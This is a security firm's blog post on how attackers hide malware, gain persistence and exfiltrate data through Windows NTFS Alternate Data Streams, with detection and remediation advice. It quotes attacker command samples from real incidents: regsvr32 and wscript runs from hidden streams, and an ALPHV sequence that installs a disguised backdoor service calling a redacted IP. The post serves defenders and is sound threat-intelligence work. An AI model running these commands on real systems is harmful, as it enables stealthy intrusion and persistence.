<img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=363521274148941&amp;ev=PageView&amp;noscript=1">
Skip to content
Login Contact Us Get Started
Login Contact Us Get Started
Blog

Living Off the Land

How Attackers Exploit Windows Alternate Data Streams

February 25, 2025

Imagine a thief who hides stolen goods in a secret compartment - one that even security scanners can’t detect.

That’s exactly how attackers leverage Windows Alternate Data Streams (ADS) to conceal malicious files like a Russian doll—hiding them within seemingly innocent files to evade detection. This technique allows cybercriminals to hide malware, establish persistence, and exfiltrate data—all while evading traditional security tools.

Let’s dive into how ADS works, how attackers exploit it, and how you can defend against it.

 

What is Windows NTFS Alternate Data Streams?

Alternate Data Streams (ADS) are a built-in "feature" of the Microsoft NT File System (NTFS), introduced in Windows NT 3.1 (1993) to ensure compatibility with Apple’s Hierarchical File System (HFS). ADS allows a user in Windows to store a file or metadata within hidden data streams of another file.

 

How Do Attackers Leverage This Feature?

Threat actors use ADS for:

  • Hiding Malicious Files – Bypassing traditional file scanning tools.

  • Hidden Malware Execution – Running malicious scripts directly from ADS to evade detection.

  • Establishing Persistence – Embedding payloads within legitimate Windows processes.

  • Exfiltrating Data – Smuggling sensitive information out of networks.

 

Embedded attackers utilize ADS to hide malicious files, execute hidden malware & in-memory execution, and to exfiltrate data. All of this with the goal to Hide Artifacts (T1564.004) [1] from the defender and their tools. Cyderes responded to recent threat leveraging this technique, abusing ADS by scheduling tasks that executed with a legitimate Windows binary to establish Command and Control (C2) and exfiltrate data through a stream within the Windows file path.

 

Sample

cmd.exe /c start /B regsvr32.exe /s C:\Windows/System32:microsoft.log

 

Before ceasing operations, ALPHV/BlackCat ransomware group was also observed abusing this capability. As reported by CrowdStrike in their report on ALPHA SPIDER (ALPHV) [2] just a year ago. The threat actor was seen creating an ADS in the C:\ drive to establish their backdoor. By doing this, ALPHV was able to hide itself from the command “dir /r”, which normally will reveal a file’s data streams.

 

Sample

Powershell -command “ & {(Get-Content C:\System -Raw | Set-Content C:\  -Stream ‘Host Process for Windows Service’)}”  
sc.exe create ssh-server binPath=”C:\:Host Process for Windows Service -b 1074 “REDACTED_IP” DisplayName=”OpenSSH Authentication Server” start= auto error= ignore 
net start ssh-server

 

While modern threat actors continue to exploit ADS for persistence and exfiltration, historical cases also demonstrate its long-standing effectiveness. One such case is APT32's abuse of ADS for registry-based persistence.

In a 2017 analysis of Ocean Buffalo (APT32) by Assaf Dahan at Cybereason [3], found that the threat actor updated registry key values to establish persistence and run .txt files that contained VBScript within its contents that would then execute PowerShell scripts. One of these registry key values added a hidden data stream for a file named “log.txt” (Dahan, 2017).

 

Sample

Wscript /Nologo /E:VBScript C:\ProgramData\Activator\scheduler\activator.ps1:log.txt

 

 

How Can You Defend Against ADS Abuse?

A key indicator identifying an ADS is the colon “:” being somewhere within a file path or file name after the declared drive letter (ex. C:\Windows\System32\image.jpg:file.txt).

In PowerShell, an obvious sign would be the “-Stream” flag, as seen in the ALPHV ransomware scenario.

Data streams can be executed in many ways; therefore, it is important to keep an eye out for the colon that shouldn’t be there. One way to check for data streams is by using PowerShell or Sysinternals (streams.exe) to periodically scan for ADS usage, with the option to automate the process for continuous monitoring.

MITRE ATT&CK provides great baseline detection methods in their detection recommendations for this technique, also known as Hide Artifacts: NTFS File Attributes - T1564.004.

MITRE ATT&CK’s T1564.004 (Hide Artifacts: NTFS File Attributes) provides excellent baseline detection methods. However, organizations need a multi-layered approach to catch these threats effectively.

 

Recommended Audit Logging for ADS Detection

  • EDR Telemetry – Comprehensive system monitoring.

  • Windows Event Logs:

    • 4104 – PowerShell script block execution (ADS-based execution).

    • 4688 – Process creation (Detect execution from ADS; ensure command-line logging is enabled).

    • 7045 – New Windows service installed (Persistence via ADS).

    • 4656 – File access attempt (Detect ADS modifications).

    • 4660 – File deletion (ADS cleanup activity).

    • 4663 – File access success (Detect ADS modifications).

    • 4698 – Scheduled task created (Persistence via ADS).

    • 4699 – Scheduled task deleted (Indicator removal).

    • 4702 – Scheduled task updated (Persistence via ADS).

 

How Cyderes Helps Defend Against ADS Attacks

Most security tools struggle with detecting ADS-based attacks because traditional endpoint security solutions don’t always scan data streams. That’s why Cyderes takes a threat-informed defense approach, combining:

SIEM & EDR Integration – SIEM analytics complement endpoint detection gaps.

Behavioral Analytics – Spotting unusual file access and execution patterns.

Custom Detections – Tailored alerts for ADS-related anomalies.

Threat Hunting – Identifying stealthy attacker behaviors in real-time.

 

In a real-world scenario, while an EDR might catch a suspicious registry key modification, it may not detect an ADS-scheduled task. Our approach ensures layered visibility across both.

 

Remediation

If you notice unusual outbound connections from atypical binaries, hidden files with ADS characteristics, or unexpected registry modifications, take immediate action:

Isolate the Affected System – Prevent lateral movement.

Investigate File and Process Anomalies – Use forensic tools to analyze ADS activity.

Remove Malicious Streams – Leverage PowerShell (Get-Item -Path C:\file.txt -Stream *) to inspect hidden streams.

Engage Cyderes for Expert Incident Response – Call 855-404-TECH (8324) for rapid assistance.

 

Final Thoughts: Stay Ahead of Stealthy Threats

Attackers will always find new ways to abuse legitimate system features for malicious purposes. Windows Alternate Data Streams remain a powerful tool for hiding threats, but with the right strategy, defenders can expose and eliminate them.

At Cyderes, we help organizations detect, respond to, and prevent sophisticated cyber threats like ADS abuse. Let’s work together to keep your environment secure. Contact us today to learn how we can enhance your security posture.

 

Contributors

Jonathan Waknin
Director, Threat Management

Ruben Huerta
Principal Security Analyst

 

References

https://attack.mitre.org/techniques/T1564/004/  

https://www.crowdstrike.com/en-us/blog/anatomy-of-alpha-spider-ransomware/

https://www.cybereason.com/hubfs/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty-Part1.pdf

 

Ready to strengthen your organization's security posture?

 

For more cybersecurity insights, follow Cyderes on LinkedIn and X.

 

Additional Insights